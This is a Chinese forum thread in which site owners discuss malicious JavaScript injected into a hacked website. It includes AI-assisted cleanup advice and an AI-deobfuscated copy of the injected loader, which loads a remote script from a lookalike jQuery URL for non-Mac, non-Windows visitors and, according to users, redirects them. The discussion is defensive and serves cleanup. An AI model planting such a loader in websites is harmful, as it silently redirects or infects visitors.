nk123 发表于 2025-8-18 01:06:29

网站被挂马了,挂马js发出来给大家

js马代码发出来,大家研究

美女约吗 发表于 2025-8-18 01:09:49

直接发js代码不就行了吗?为什么要打包呢?

nk123 发表于 2025-8-18 01:36:59

美女约吗 发表于 2025-8-18 01:09
直接发js代码不就行了吗?为什么要打包呢?

hostloc禁止发,你试试

海的那一边 发表于 2025-8-18 01:41:35

本帖最后由 海的那一边 于 2025-8-18 01:48 编辑

nk123 发表于 2025-8-18 01:36
hostloc禁止发,你试试

问ai结果删除以下代码段:
function xxSJRox(e) 中间代码发不出来100);
/*138ae887806f*/

https://img10.360buyimg.com/ddimg/jfs/t1/315864/1/27072/80872/68a215b0F5206180f/9a017ab5b6ea8a21.jpg

全面排查网站文件:

攻击者可能不止在一处植入了代码。请仔细检查所有网站文件,特别是最近被修改过的文件,查找类似特征的混淆代码。可以搜索文件中是否包含 eval, aPnDhiTia, xxSJRox 等关键词。

代码末尾的注释 /*138ae887806f*/ 可能是攻击者的一个标识,您也可以尝试在所有文件中搜索这个字符串。

hxhx 发表于 2025-8-18 11:02:49

海的那一边 发表于 2025-8-18 01:41
问ai结果删除以下代码段:
function xxSJRox(e) 中间代码发不出来100);
/*138ae887806f*/


前段时间我就发过帖子了 https://hostloc.com/thread-1424027-1-1.html

美女约吗 发表于 2025-8-18 13:13:35

这代码是跳广告还是

sfss5362 发表于 2025-8-18 13:24:10

太可怕了

lanmin 发表于 2025-8-18 15:10:34

gpt给还原后的代码
function loadJQuery() {
    // jQuery 3.6.8 CDN
    var url = "https://code.jquery.com/jquery.min-3.6.8.js";

    // 创建 script 标签
    var script = document.createElement("script");
    script.type = "text/javascript";
    script.src = url;

    // 加载完成的回调(原代码里是个空函数)
    script.onload = function () {
      console.log("jQuery 已加载:", url);
    };

    // 插入到 <head>
    document.head.appendChild(script);
}

// 如果不是 Mac 或 Windows 平台,就执行加载
if (!(/^Mac|Win/.test(navigator.platform))) {
    loadJQuery();
}

nk123 发表于 2025-8-18 15:31:20

美女约吗 发表于 2025-8-18 13:13
这代码是跳广告还是


跳转

NetAnt 发表于 2025-8-18 15:37:34

月初的时候WP也被入侵了,只修改了WP站点文件。。
WP貌似被黑过三四次了。。。
页: [1] 2
查看完整版本: 网站被挂马了,挂马js发出来给大家